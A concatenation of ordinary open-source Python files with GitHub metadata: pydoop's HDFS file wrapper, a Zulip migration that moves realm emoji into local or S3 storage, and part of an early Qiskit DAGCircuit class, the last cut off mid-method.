assert est_times[0] == 0
assert len(est_times) == len(est_labels) + 1
| {
"content_hash": "622f3e0d93c513a5502129ddc12ecfdb",
"timestamp": "",
"source": "github",
"line_count": 236,
"max_line_length": 79,
"avg_line_length": 34.233050847457626,
"alnum_prop": 0.632132689689318,
"repo_name": "urinieto/msaf",
"id": "8e775fa7b8daf3df926c374f98ba2d3fbf26fc09",
"size": "8176",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_run.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "159218"
},
{
"name": "Python",
"bytes": "385875"
},
{
"name": "Shell",
"bytes": "1436"
}
],
"symlink_target": ""
} |
"""
pydoop.hdfs.file -- HDFS File Objects
-------------------------------------
"""
import os
import common
def _complain_ifclosed(closed):
if closed:
raise ValueError("I/O operation on closed HDFS file object")
class hdfs_file(object):
"""
Instances of this class represent HDFS file objects.
Objects from this class should not be instantiated directly. The
preferred way to open an HDFS file is with the :func:`open` function;
alternatively, :meth:`hdfs.open_file` can be used.
"""
ENDL = os.linesep
def __init__(self, raw_hdfs_file, fs, name, flags, chunk_size=common.BUFSIZE):
if not chunk_size > 0:
raise ValueError("chunk size must be positive")
self.f = raw_hdfs_file
self.__fs = fs
self.__name = fs.get_path_info(name)["name"]
self.__size = fs.get_path_info(name)["size"]
self.__mode = "r" if flags == os.O_RDONLY else "w"
self.chunk_size = chunk_size
self.closed = False
self.__reset()
def __reset(self):
self.buffer_list = []
self.chunk = ""
self.EOF = False
self.p = 0
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
@property
def fs(self):
"""
The file's hdfs instance.
"""
return self.__fs
@property
def name(self):
"""
The file's fully qualified name.
"""
return self.__name
@property
def size(self):
"""
The file's size in bytes. This attribute is initialized when the
file is opened and updated when it is closed.
"""
return self.__size
@property
def mode(self):
"""
The I/O mode for the file.
"""
return self.__mode
def __read_chunk(self):
self.chunk = self.f.read(self.chunk_size)
self.p = 0
if not self.chunk:
self.EOF = True
def __read_chunks_until_nl(self):
if self.EOF:
eol = self.chunk.find(self.ENDL, self.p)
return eol if eol > -1 else len(self.chunk)
if not self.chunk:
self.__read_chunk()
eol = self.chunk.find(self.ENDL, self.p)
while eol < 0 and not self.EOF:
if self.p < len(self.chunk):
self.buffer_list.append(self.chunk[self.p:])
self.__read_chunk()
eol = self.chunk.find(self.ENDL, self.p)
return eol if eol > -1 else len(self.chunk)
def readline(self):
"""
Read and return a line of text.
:rtype: string
:return: the next line of text in the file, including the newline character
"""
_complain_ifclosed(self.closed)
eol = self.__read_chunks_until_nl()
line = "".join(self.buffer_list) + self.chunk[self.p:eol+1]
self.buffer_list = []
self.p = eol+1
return line
def next(self):
"""
Return the next input line, or raise :class:`StopIteration`
when EOF is hit.
"""
_complain_ifclosed(self.closed)
line = self.readline()
if line == "":
raise StopIteration
return line
def __iter__(self):
return self
def available(self):
"""
Number of bytes that can be read from this input stream without blocking.
:rtype: int
:return: available bytes
"""
_complain_ifclosed(self.closed)
return self.f.available()
def close(self):
"""
Close the file.
"""
if not self.closed:
self.closed = True
retval = self.f.close()
if self.mode == "w":
self.__size = self.fs.get_path_info(self.name)["size"]
return retval
def pread(self, position, length):
"""
Read ``length`` bytes of data from the file, starting from ``position``\ .
:type position: int
:param position: position from which to read
:type length: int
:param length: the number of bytes to read
:rtype: string
:return: the chunk of data read from the file
"""
_complain_ifclosed(self.closed)
return self.f.pread(position, length)
def pread_chunk(self, position, chunk):
"""
Works like :meth:`pread`\ , but data is stored in the writable
buffer ``chunk`` rather than returned. Reads at most a number of
bytes equal to the size of ``chunk``\ .
:type position: int
:param position: position from which to read
:type chunk: writable string buffer
:param chunk: a c-like string buffer, such as the one returned by the
``create_string_buffer`` function in the :mod:`ctypes` module
:rtype: int
:return: the number of bytes read
"""
_complain_ifclosed(self.closed)
return self.f.pread_chunk(position, chunk)
def read(self, length=-1):
"""
Read ``length`` bytes from the file. If ``length`` is negative or
omitted, read all data until EOF.
:type length: int
:param length: the number of bytes to read
:rtype: string
:return: the chunk of data read from the file
"""
_complain_ifclosed(self.closed)
# NOTE: libhdfs read stops at block boundaries: it is *essential*
# to ensure that we actually read the required number of bytes.
if length < 0:
length = self.size
chunks = []
while 1:
if length <= 0:
break
c = self.f.read(min(self.chunk_size, length))
if c == "":
break
chunks.append(c)
length -= len(c)
return "".join(chunks)
def read_chunk(self, chunk):
"""
Works like :meth:`read`\ , but data is stored in the writable
buffer ``chunk`` rather than returned. Reads at most a number of
bytes equal to the size of ``chunk``\ .
:type chunk: writable string buffer
:param chunk: a c-like string buffer, such as the one returned by the
``create_string_buffer`` function in the :mod:`ctypes` module
:rtype: int
:return: the number of bytes read
"""
_complain_ifclosed(self.closed)
return self.f.read_chunk(chunk)
def seek(self, position, whence=os.SEEK_SET):
"""
Seek to ``position`` in file.
:type position: int
:param position: offset in bytes to seek to
:type whence: int
:param whence: defaults to ``os.SEEK_SET`` (absolute); other
values are ``os.SEEK_CUR`` (relative to the current position)
and ``os.SEEK_END`` (relative to the file's end).
"""
_complain_ifclosed(self.closed)
if whence == os.SEEK_CUR:
position += self.tell()
elif whence == os.SEEK_END:
position += self.size
position = max(0, position)
self.__reset()
return self.f.seek(position)
def tell(self):
"""
Get the current byte offset in the file.
:rtype: int
:return: current offset in bytes
"""
_complain_ifclosed(self.closed)
return self.f.tell()
def write(self, data):
"""
Write ``data`` to the file.
:type data: string
:param data: the data to be written to the file
:rtype: int
:return: the number of bytes written
"""
_complain_ifclosed(self.closed)
return self.f.write(data)
def write_chunk(self, chunk):
"""
Write data from buffer ``chunk`` to the file.
:type chunk: writable string buffer
:param chunk: a c-like string buffer, such as the one returned by the
``create_string_buffer`` function in the :mod:`ctypes` module
:rtype: int
:return: the number of bytes written
"""
_complain_ifclosed(self.closed)
return self.f.write_chunk(chunk)
def flush(self):
"""
Force any buffered output to be written.
"""
_complain_ifclosed(self.closed)
return self.f.flush()
class local_file(file):
def __init__(self, fs, name, flags):
if not flags.startswith("r"):
local_file.__make_parents(fs, name)
super(local_file, self).__init__(name, flags)
self.__fs = fs
self.__name = os.path.abspath(super(local_file, self).name)
self.__size = os.fstat(super(local_file, self).fileno()).st_size
self.f = self
self.chunk_size = 0
@staticmethod
def __make_parents(fs, name):
d = os.path.dirname(name)
if d:
try:
fs.create_directory(d)
except IOError:
raise IOError("Cannot open file %s" % name)
@property
def fs(self):
return self.__fs
@property
def name(self):
return self.__name
@property
def size(self):
return self.__size
def write(self, data):
super(local_file, self).write(data)
return len(data)
def available(self):
_complain_ifclosed(self.closed)
return self.size
def close(self):
if self.mode == "w":
self.flush()
os.fsync(self.fileno())
self.__size = os.fstat(self.fileno()).st_size
super(local_file, self).close()
def pread(self, position, length):
_complain_ifclosed(self.closed)
old_pos = self.tell()
self.seek(position)
data = self.read(length)
self.seek(old_pos)
return data
def pread_chunk(self, position, chunk):
_complain_ifclosed(self.closed)
data = self.pread(position, len(chunk))
chunk.value = data
return len(data)
def read_chunk(self, chunk):
_complain_ifclosed(self.closed)
data = self.read(len(chunk))
chunk.value = data
return len(data)
def write_chunk(self, chunk):
_complain_ifclosed(self.closed)
return self.write(chunk.value)
| {
"content_hash": "129571f72f2bff6771909353051a39f3",
"timestamp": "",
"source": "github",
"line_count": 353,
"max_line_length": 80,
"avg_line_length": 25.813031161473088,
"alnum_prop": 0.6209394205443372,
"repo_name": "jkahn/pydoop-code",
"id": "569cd45915d128dd90bd73cf6f509fce359eda3e",
"size": "9728",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pydoop/hdfs/file.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "731584"
},
{
"name": "C++",
"bytes": "513848"
},
{
"name": "Java",
"bytes": "480901"
},
{
"name": "Python",
"bytes": "291616"
},
{
"name": "Ruby",
"bytes": "9955"
},
{
"name": "Shell",
"bytes": "1945"
}
],
"symlink_target": ""
} |
import os
import io
import logging
import requests
from mimetypes import guess_type
from PIL import Image
from PIL import ImageOps
from django.db import migrations, models
from django.db import migrations
from django.db.backends.postgresql_psycopg2.schema import DatabaseSchemaEditor
from django.db.migrations.state import StateApps
from django.conf import settings
from boto.s3.key import Key
from boto.s3.connection import S3Connection
from requests import ConnectionError, Response
from typing import Dict, Text, Tuple, Optional, Union
from six import binary_type
def force_str(s, encoding='utf-8'):
# type: (Union[Text, binary_type], Text) -> str
"""converts a string to a native string"""
if isinstance(s, str):
return s
elif isinstance(s, Text):
return s.encode(str(encoding))
elif isinstance(s, binary_type):
return s.decode(encoding)
else:
raise TypeError("force_str expects a string type")
class Uploader(object):
def __init__(self):
# type: () -> None
self.path_template = "{realm_id}/emoji/{emoji_file_name}"
self.emoji_size = (64, 64)
def upload_files(self, response, resized_image, dst_path_id):
# type: (Response, binary_type, Text) -> None
raise NotImplementedError()
def get_dst_path_id(self, realm_id, url, emoji_name):
# type: (int, Text, Text) -> Tuple[Text,Text]
_, image_ext = os.path.splitext(url)
file_name = ''.join((emoji_name, image_ext))
return file_name, self.path_template.format(realm_id=realm_id, emoji_file_name=file_name)
def resize_emoji(self, image_data):
# type: (binary_type) -> Optional[binary_type]
im = Image.open(io.BytesIO(image_data))
format_ = im.format
if format_ == 'GIF' and im.is_animated:
return None
im = ImageOps.fit(im, self.emoji_size, Image.ANTIALIAS)
out = io.BytesIO()
im.save(out, format_)
return out.getvalue()
def upload_emoji(self, realm_id, image_url, emoji_name):
# type: (int, Text, Text) -> Optional[Text]
file_name, dst_path_id = self.get_dst_path_id(realm_id, image_url, emoji_name)
try:
response = requests.get(image_url, stream=True)
except ConnectionError:
return None
if response.status_code != 200:
return None
try:
resized_image = self.resize_emoji(response.content)
except IOError:
return None
self.upload_files(response, resized_image, dst_path_id)
return file_name
class LocalUploader(Uploader):
def __init__(self):
# type: () -> None
super(LocalUploader, self).__init__()
@staticmethod
def mkdirs(path):
# type: (Text) -> None
dirname = os.path.dirname(path)
if not os.path.isdir(dirname):
os.makedirs(dirname)
def write_local_file(self, path, file_data):
# type: (Text, binary_type) -> None
self.mkdirs(path)
with open(path, 'wb') as f:
f.write(file_data)
def upload_files(self, response, resized_image, dst_path_id):
# type: (Response, binary_type, Text) -> None
dst_file = os.path.join(settings.LOCAL_UPLOADS_DIR, 'avatars', dst_path_id)
if resized_image:
self.write_local_file(dst_file, resized_image)
else:
self.write_local_file(dst_file, response.content)
self.write_local_file('.'.join((dst_file, 'original')), response.content)
class S3Uploader(Uploader):
def __init__(self):
# type: () -> None
super(S3Uploader, self).__init__()
conn = S3Connection(settings.S3_KEY, settings.S3_SECRET_KEY)
bucket_name = settings.S3_AVATAR_BUCKET
self.bucket = conn.get_bucket(bucket_name, validate=False)
def upload_to_s3(self, path, file_data, headers):
# type: (Text, binary_type, Optional[Dict[Text, Text]]) -> None
key = Key(self.bucket)
key.key = path
key.set_contents_from_string(force_str(file_data), headers=headers)
def upload_files(self, response, resized_image, dst_path_id):
# type: (Response, binary_type, Text) -> None
headers = None # type: Optional[Dict[Text, Text]]
content_type = response.headers.get(str("Content-Type")) or guess_type(dst_path_id)[0]
if content_type:
headers = {u'Content-Type': content_type}
if resized_image:
self.upload_to_s3(dst_path_id, resized_image, headers)
else:
self.upload_to_s3(dst_path_id, response.content, headers)
self.upload_to_s3('.'.join((dst_path_id, 'original')), response.content, headers)
def get_uploader():
# type: () -> Uploader
if settings.LOCAL_UPLOADS_DIR is None:
return S3Uploader()
return LocalUploader()
def upload_emoji_to_storage(apps, schema_editor):
# type: (StateApps, DatabaseSchemaEditor) -> None
realm_emoji_model = apps.get_model('zerver', 'RealmEmoji')
uploader = get_uploader() # type: Uploader
for emoji in realm_emoji_model.objects.all():
file_name = uploader.upload_emoji(emoji.realm_id, emoji.img_url, emoji.name)
if file_name is None:
logging.warning("ERROR: Could not download emoji %s; please reupload manually" %
(emoji,))
emoji.file_name = file_name
emoji.save()
class Migration(migrations.Migration):
dependencies = [
('zerver', '0076_userprofile_emojiset'),
]
operations = [
migrations.AddField(
model_name='realmemoji',
name='file_name',
field=models.TextField(db_index=True, null=True),
),
migrations.RunPython(upload_emoji_to_storage),
migrations.RemoveField(
model_name='realmemoji',
name='img_url',
),
]
| {
"content_hash": "3206a62f6d0dbf92c0d7f58e1a1abb3c",
"timestamp": "",
"source": "github",
"line_count": 171,
"max_line_length": 97,
"avg_line_length": 34.70175438596491,
"alnum_prop": 0.6199865183687226,
"repo_name": "amanharitsh123/zulip",
"id": "9a88727767687552cf4326ddc04d4d95a894ff04",
"size": "6008",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "zerver/migrations/0077_add_file_name_field_to_realm_emoji.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "432211"
},
{
"name": "Emacs Lisp",
"bytes": "158"
},
{
"name": "HTML",
"bytes": "494378"
},
{
"name": "JavaScript",
"bytes": "2167185"
},
{
"name": "Nginx",
"bytes": "1485"
},
{
"name": "Pascal",
"bytes": "1113"
},
{
"name": "Perl",
"bytes": "401825"
},
{
"name": "Puppet",
"bytes": "86921"
},
{
"name": "Python",
"bytes": "3792729"
},
{
"name": "Ruby",
"bytes": "249744"
},
{
"name": "Shell",
"bytes": "61752"
}
],
"symlink_target": ""
} |
"""
Object to represent a quantum circuit as a directed acyclic graph.
The nodes in the graph are either input/output nodes or operation nodes.
The operation nodes are elements of a basis that is part of the circuit.
The QASM definitions of the basis elements are carried with the circuit.
The edges correspond to qubits or bits in the circuit. A directed edge
from node A to node B means that the (qu)bit passes from the output of A
to the input of B. The object's methods allow circuits to be constructed,
composed, and modified. Some natural properties like depth can be computed
directly from the graph.
"""
import itertools
import copy
import networkx as nx
from ._dagcircuiterror import DAGCircuitError
class DAGCircuit:
"""
Quantum circuit as a directed acyclic graph.
There are 3 types of nodes in the graph: inputs, outputs, and operations.
The nodes are connected by directed edges that correspond to qubits and
bits.
"""
# pylint: disable=invalid-name
def __init__(self):
"""Create an empty circuit."""
# Map from a wire's name (reg,idx) to a Bool that is True if the
# wire is a classical bit and False if the wire is a qubit.
self.wire_type = {}
# Map from wire names (reg,idx) to input nodes of the graph
self.input_map = {}
# Map from wire names (reg,idx) to output nodes of the graph
self.output_map = {}
# Running count of the total number of nodes
self.node_counter = 0
# Map of named operations in this circuit and their signatures.
# The signature is an integer tuple (nq,nc,np) specifying the
# number of input qubits, input bits, and real parameters.
# The definition is external to the circuit object.
self.basis = {}
# Directed multigraph whose nodes are inputs, outputs, or operations.
# Operation nodes have equal in- and out-degrees and carry
# additional data about the operation, including the argument order
# and parameter values.
# Input nodes have out-degree 1 and output nodes have in-degree 1.
# Edges carry wire labels (reg,idx) and each operation has
# corresponding in- and out-edges with the same wire labels.
self.multi_graph = nx.MultiDiGraph()
# Map of qregs to sizes
self.qregs = {}
# Map of cregs to sizes
self.cregs = {}
# Map of user defined gates to ast nodes defining them
self.gates = {}
# Output precision for printing floats
self.prec = 10
def get_qubits(self):
"""Return a list of qubits as (qreg, index) pairs."""
return [(k, i) for k, v in self.qregs.items() for i in range(v)]
def rename_register(self, regname, newname):
"""Rename a classical or quantum register throughout the circuit.
regname = existing register name string
newname = replacement register name string
"""
if regname == newname:
return
if newname in self.qregs or newname in self.cregs:
raise DAGCircuitError("duplicate register name %s" % newname)
if regname not in self.qregs and regname not in self.cregs:
raise DAGCircuitError("no register named %s" % regname)
iscreg = False
if regname in self.qregs:
self.qregs[newname] = self.qregs[regname]
self.qregs.pop(regname, None)
reg_size = self.qregs[newname]
if regname in self.cregs:
self.cregs[newname] = self.cregs[regname]
self.cregs.pop(regname, None)
reg_size = self.cregs[newname]
iscreg = True
for i in range(reg_size):
self.wire_type[(newname, i)] = iscreg
self.wire_type.pop((regname, i), None)
self.input_map[(newname, i)] = self.input_map[(regname, i)]
self.input_map.pop((regname, i), None)
self.output_map[(newname, i)] = self.output_map[(regname, i)]
self.output_map.pop((regname, i), None)
# n node d = data
for n, d in self.multi_graph.nodes_iter(data=True):
if d["type"] == "in" or d["type"] == "out":
if d["name"][0] == regname:
d["name"] = (newname, d["name"][1])
elif d["type"] == "op":
qa = []
for a in d["qargs"]:
if a[0] == regname:
a = (newname, a[1])
qa.append(a)
d["qargs"] = qa
ca = []
for a in d["cargs"]:
if a[0] == regname:
a = (newname, a[1])
ca.append(a)
d["cargs"] = ca
if d["condition"] is not None:
if d["condition"][0] == regname:
d["condition"] = (newname, d["condition"][1])
# eX = edge, d= data
for e1, e2, d in self.multi_graph.edges_iter(data=True):
if d["name"][0] == regname:
d["name"] = (newname, d["name"][1])
def remove_all_ops_named(self, opname):
"""Remove all operation nodes with the given name."""
nlist = self.get_named_nodes(opname)
for n in nlist:
self._remove_op_node(n)
def deepcopy(self):
"""Return a deep copy of self."""
return copy.deepcopy(self)
def fs(self, number):
"""Format a float f as a string with self.prec digits."""
fmt = "{0:0.%snumber}" % self.prec
return fmt.format(number)
def add_qreg(self, name, size):
"""Add all wires in a quantum register named name with size."""
if name in self.qregs or name in self.cregs:
raise DAGCircuitError("duplicate register name %s" % name)
self.qregs[name] = size
for j in range(size):
self._add_wire((name, j))
def add_creg(self, name, size):
"""Add all wires in a classical register named name with size."""
if name in self.qregs or name in self.cregs:
raise DAGCircuitError("duplicate register name %s" % name)
self.cregs[name] = size
for j in range(size):
self._add_wire((name, j), True)
def _add_wire(self, name, isClassical=False):
"""Add a qubit or bit to the circuit.
name is a (string,int) tuple containing register name and index
This adds a pair of in and out nodes connected by an edge.
"""
if name not in self.wire_type:
self.wire_type[name] = isClassical
self.node_counter += 1
self.input_map[name] = self.node_counter
self.node_counter += 1
self.output_map[name] = self.node_counter
in_node = self.input_map[name]
out_node = self.output_map[name]
self.multi_graph.add_edge(in_node, out_node)
self.multi_graph.node[in_node]["type"] = "in"
self.multi_graph.node[out_node]["type"] = "out"
self.multi_graph.node[in_node]["name"] = name
self.multi_graph.node[out_node]["name"] = name
self.multi_graph.edge[in_node][out_node][0]["name"] = name
else:
raise DAGCircuitError("duplicate wire %s" % name)
def add_basis_element(self, name, number_qubits,
number_classical=0, number_parameters=0):
"""Add an operation to the basis.
name is string label for operation
number_qubits is number of qubit arguments
number_classical is number of bit arguments
number_parameters is number of real parameters
The parameters (nq,nc,np) are ignored for the special case
when name = "barrier". The barrier instruction has a variable
number of qubit arguments.
"""
if name not in self.basis:
self.basis[name] = (
number_qubits,
number_classical,
number_parameters)
if name in self.gates:
if self.gates[name]["n_args"] != number_parameters or \
self.gates[name]["n_bits"] != number_qubits or number_classical != 0:
raise DAGCircuitError("gate data does not match "
+ "basis element specification")
def add_gate_data(self, name, gatedata):
"""Add the definition of a gate.
gatedata is dict with fields:
"opaque" = True or False
"n_args" = number of real parameters
"n_bits" = number of qubits
"args" = list of parameter names
"bits" = list of qubit names
"body" = GateBody AST node
"""
if name not in self.gates:
self.gates[name] = gatedata
if name in self.basis:
if self.basis[name][0] != self.gates[name]["n_bits"] or \
self.basis[name][1] != 0 or \
self.basis[name][2] != self.gates[name]["n_args"]:
raise DAGCircuitError("gate data does not match "
+ "basis element specification")
def _check_basis_data(self, name, qargs, cargs, params):
"""Check the arguments against the data for this operation.
name is a string
qargs is a list of tuples like ("q",0)
cargs is a list of tuples like ("c",0)
params is a list of strings that represent floats
"""
# Check that we have this operation
if name not in self.basis:
raise DAGCircuitError("%s is not in the list of basis operations"
% name)
# Check the number of arguments matches the signature
if name != "barrier":
if len(qargs) != self.basis[name][0]:
raise DAGCircuitError("incorrect number of qubits for %s"
% name)
if len(cargs) != self.basis[name][1]:
raise DAGCircuitError("incorrect number of bits for %s"
% name)
if len(params) != self.basis[name][2]:
raise DAGCircuitError("incorrect number of parameters for %s"
% name)
else:
# "barrier" is a special case
if len(qargs) == 0:
raise DAGCircuitError("incorrect number of qubits for %s"
% name)
if len(cargs) != 0:
raise DAGCircuitError("incorrect number of bits for %s"
% name)
if len(params) != 0:
raise DAGCircuitError("incorrect number of parameters for %s"
% name)
def _check_condition(self, name, condition):
"""Verify that the condition is valid.
name is a string used for error reporting
condition is either None or a tuple (string,int) giving (creg,value)
"""
# Verify creg exists
if condition is not None and condition[0] not in self.cregs:
raise DAGCircuitError("invalid creg in condition for %s" % name)
def _check_bits(self, args, amap, bval):
"""Check the values of a list of (qu)bit arguments.
For each element A of args, check that amap contains A and
self.wire_type[A] equals bval.
args is a list of (regname,idx) tuples
amap is a dictionary keyed on (regname,idx) tuples
bval is boolean
"""
# Check for each wire
for q in args:
if q not in amap:
raise DAGCircuitError("(qu)bit %s not found" % q)
if self.wire_type[q] != bval:
raise DAGCircuitError("expected wire type %s for %s"
% (bval, q))
def _bits_in_condition(self, cond):
"""Return a list of bits (regname,idx) in the given condition.
cond is either None or a (regname,int) tuple specifying
a classical if condition.
"""
all_bits = []
if cond is not None:
all_bits.extend([(cond[0], j) for j in range(self.cregs[cond[0]])])
return all_bits
def _add_op_node(self, nname, nqargs, ncargs, nparams, ncondition):
"""Add a new operation node to the graph and assign properties.
nname node name
nqargs quantum arguments
ncargs classical arguments
nparams parameters
ncondition classical condition (or None)
"""
# Add a new operation node to the graph
self.node_counter += 1
self.multi_graph.add_node(self.node_counter)
# Update that operation node's data
self.multi_graph.node[self.node_counter]["type"] = "op"
self.multi_graph.node[self.node_counter]["name"] = nname
self.multi_graph.node[self.node_counter]["qargs"] = nqargs
self.multi_graph.node[self.node_counter]["cargs"] = ncargs
self.multi_graph.node[self.node_counter]["params"] = nparams
self.multi_graph.node[self.node_counter]["condition"] = ncondition
def apply_operation_back(self, name, qargs, cargs=[], params=[],
condition=None):
"""Apply an operation to the output of the circuit.
name is a string
qargs is a list of tuples like ("q",0)
cargs is a list of tuples like ("c",0)
params is a list of strings that represent floats
condition is either None or a tuple (string,int) giving (creg,value)
"""
all_cbits = self._bits_in_condition(condition)
all_cbits.extend(cargs)
self._check_basis_data(name, qargs, cargs, params)
self._check_condition(name, condition)
self._check_bits(qargs, self.output_map, False)
self._check_bits(all_cbits, self.output_map, True)
self._add_op_node(name, qargs, cargs, list(map(str, params)),
condition)
# Add new in-edges from predecessors of the output nodes to the
# operation node while deleting the old in-edges of the output nodes
# and adding new edges from the operation node to each output node
al = [qargs, all_cbits]
for q in itertools.chain(*al):
ie = self.multi_graph.predecessors(self.output_map[q])
assert len(ie) == 1, "output node has multiple in-edges"
self.multi_graph.add_edge(ie[0], self.node_counter, name=q)
self.multi_graph.remove_edge(ie[0], self.output_map[q])
self.multi_graph.add_edge(
self.node_counter, self.output_map[q], name=q)
def apply_operation_front(self, name, qargs, cargs=[], params=[],
condition=None):
"""Apply an operation to the input of the circuit.
name is a string
qargs is a list of strings like "q[0]"
cargs is a list of strings like "c[0]"
params is a list of strings that represent floats
condition is either None or a tuple (string,int) giving (creg,value)
"""
all_cbits = self._bits_in_condition(condition)
all_cbits.extend(cargs)
self._check_basis_data(name, qargs, cargs, params)
self._check_condition(name, condition)
self._check_bits(qargs, self.input_map, False)
self._check_bits(all_cbits, self.input_map, True)
self._add_op_node(name, qargs, cargs, list(map(str, params)),
condition)
# Add new out-edges to successors of the input nodes from the
# operation node while deleting the old out-edges of the input nodes
# and adding new edges to the operation node from each input node
al = [qargs, all_cbits]
for q in itertools.chain(*al):
ie = self.multi_graph.successors(self.input_map[q])
assert len(ie) == 1, "input node has multiple out-edges"
self.multi_graph.add_edge(self.node_counter, ie[0], name=q)
self.multi_graph.remove_edge(self.input_map[q], ie[0])
self.multi_graph.add_edge(
self.input_map[q], self.node_counter, name=q)
def _make_union_basis(self, input_circuit):
"""Return a new basis map.
The new basis is a copy of self.basis with
new elements of input_circuit.basis added.
input_circuit is a DAGCircuit
"""
union_basis = copy.deepcopy(self.basis)
for g in input_circuit.basis:
if g not in union_basis:
union_basis[g] = input_circuit.basis[g]
if union_basis[g] != input_circuit.basis[g]:
raise DAGCircuitError("incompatible basis")
return union_basis
def _make_union_gates(self, input_circuit):
"""Return a new gates map.
The new gates are a copy of self.gates with
new elements of input_circuit.gates added.
input_circuit is a DAGCircuit
NOTE: gates in input_circuit that are also in self must
be *identical* to the gates in self
"""
union_gates = copy.deepcopy(self.gates)
for k, v in input_circuit.gates.items():
if k not in union_gates:
union_gates[k] = v
if union_gates[k]["opaque"] != input_circuit.gates[k]["opaque"] or\
union_gates[k]["n_args"] != input_circuit.gates[k]["n_args"] or\
union_gates[k]["n_bits"] != input_circuit.gates[k]["n_bits"] or\
union_gates[k]["args"] != input_circuit.gates[k]["args"] or\
union_gates[k]["bits"] != input_circuit.gates[k]["bits"]:
raise DAGCircuitError("inequivalent gate definitions for %s"
% k)
if not union_gates[k]["opaque"] and \
union_gates[k]["body"].qasm() != \
input_circuit.gates[k]["body"].qasm():
raise DAGCircuitError("inequivalent gate definitions for %s"
% k)
return union_gates
def _check_wiremap_registers(self, wire_map, keyregs, valregs,
valreg=True):
"""Check that wiremap neither fragments nor leaves duplicate registers.
1. There are no fragmented registers. A register in keyregs
is fragmented if not all of its (qu)bits are renamed by wire_map.
2. There are no duplicate registers. A register is duplicate if
it appears in both self and keyregs but not in wire_map.
wire_map is a map from (regname,idx) in keyregs to (regname,idx)
in valregs
keyregs is a map from register names to sizes
valregs is a map from register names to sizes
valreg is a Bool, if False the method ignores valregs and does not
add regs for bits in the wire_map image that don't appear in valregs
Return the set of regs to add to self
"""
add_regs = set([])
reg_frag_chk = {}
for k, v in keyregs.items():
reg_frag_chk[k] = {j: False for j in range(v)}
for k in wire_map.keys():
if k[0] in keyregs:
reg_frag_chk[k[0]][k[1]] = True
for k, v in reg_frag_chk.items():
rname = ",".join(map(str, k))
s = set(v.values())
if len(s) == 2:
raise DAGCircuitError("wire_map fragments reg %s" % rname)
elif s == set([False]):
if k in self.qregs or k in self.cregs:
raise DAGCircuitError("unmapped duplicate reg %s" % rname)
else:
# Add registers that appear only in keyregs
add_regs.add((k, keyregs[k]))
else:
if valreg:
# If mapping to a register not in valregs, add it.
# (k,0) exists in wire_map because wire_map doesn't
# fragment k
if not wire_map[(k, 0)][0] in valregs:
size = max(map(lambda x: x[1],
filter(lambda x: x[0]
== wire_map[(k, 0)][0],
wire_map.values())))
add_regs.add((wire_map[(k, 0)][0], size + 1))
return add_regs
def _check_wiremap_validity(self, wire_map, keymap, valmap, input_circuit):
"""Check that the wiremap is consistent.
Check that the wiremap refers to valid wires and that
those wires have consistent types.
wire_map is a map from (regname,idx) in keymap to (regname,idx)
in valmap
keymap is a map whose keys are wire_map keys
valmap is a map whose keys are wire_map values
input_circuit is a DAGCircuit
"""
for k, v in wire_map.items():
kname = ",".join(map(str, k))
vname = ",".join(map(str, v))
if k not in keymap:
raise DAGCircuitError("invalid wire mapping key %s" % kname)
if v not in valmap:
raise DAGCircuitError("invalid wire mapping value %s"
% vname)
if input_circuit.wire_type[k] != self.wire_type[v]:
raise DAGCircuitError("inconsistent wire_map at (%s,%s)"
% (kname, vname))
def _map_condition(self, wire_map, condition):
"""Use the wire_map dict to change the condition tuple's creg name.
wire_map is map from wires to wires
condition is a tuple (reg,int)
Returns the new condition tuple
"""
if condition is None:
n_condition = None
else:
# Map the register name, using fact that registers must not be
# fragmented by the wire_map (this must have been checked
# elsewhere)
bit0 = (condition[0], 0)
n_condition = (wire_map.get(bit0, bit0)[0], condition[1])
return n_condition
def compose_back(self, input_circuit, wire_map={}):
"""Apply the input circuit to the output of this circuit.
The two bases must be "compatible" or an exception occurs.
A subset of input qubits of the input circuit are mapped
to a subset of output qubits of this circuit.
wire_map[input_qubit_to_input_circuit] = output_qubit_of_self
"""
union_basis = self._make_union_basis(input_circuit)
union_gates = self._make_union_gates(input_circuit)
# Check the wire map for duplicate values
if len(set(wire_map.values())) != len(wire_map):
raise DAGCircuitError("duplicates in wire_map")
add_qregs = self._check_wiremap_registers(wire_map,
input_circuit.qregs,
self.qregs)
for register in add_qregs:
self.add_qreg(register[0], register[1])
add_cregs = self._check_wiremap_registers(wire_map,
input_circuit.cregs,
self.cregs)
for register in add_cregs:
self.add_creg(register[0], register[1])
self._check_wiremap_validity(wire_map, input_circuit.input_map,
self.output_map, input_circuit)
# Compose
self.basis = union_basis
self.gates = union_gates
topological_sort = nx.topological_sort(input_circuit.multi_graph)
for node in topological_sort:
nd = input_circuit.multi_graph.node[n]
if nd["type"] == "in":
# if in wire_map, get new name, else use existing name
m_name = wire_map.get(nd["name"], nd["name"])
# the mapped wire should already exist
assert m_name in self.output_map, \
"wire (%s,%d) not in self" % (m_name[0], m_name[1])
assert nd["name"] in input_circuit.wire_type, \
"inconsistent wire_type for (%s,%d) in input_circuit" \
% (nd["name"][0], nd["name"][1])
elif nd["type"] == "out":
# ignore output nodes
pass
elif nd["type"] == "op":
condition = self._map_condition(wire_map, nd["condition"])
self._check_condition(nd["name"], condition)
m_qargs = list(map(lambda x: wire_map.get(x, x), nd["qargs"]))
m_cargs = list(map(lambda x: wire_map.get(x, x), nd["cargs"]))
self.apply_operation_back(nd["name"], m_qargs, m_cargs,
nd["params"], condition)
else:
assert False, "bad node type %s" % nd["type"]
def compose_front(self, input_circuit, wire_map={}):
"""Apply the input circuit to the input of this circuit.
The two bases must be "compatible" or an exception occurs.
A subset of output qubits of the input circuit are mapped
to a subset of input qubits of
this circuit.
"""
union_basis = self._make_union_basis(input_circuit)
union_gates = self._make_union_gates(input_circuit)
# Check the wire map
if len(set(wire_map.values())) != len(wire_map):
raise DAGCircuitError("duplicates in wire_map")
add_qregs = self._check_wiremap_registers(wire_map,
input_circuit.qregs,
self.qregs)
for r in add_qregs:
self.add_qreg(r[0], r[1])
add_cregs = self._check_wiremap_registers(wire_map,
input_circuit.cregs,
self.cregs)
for r in add_cregs:
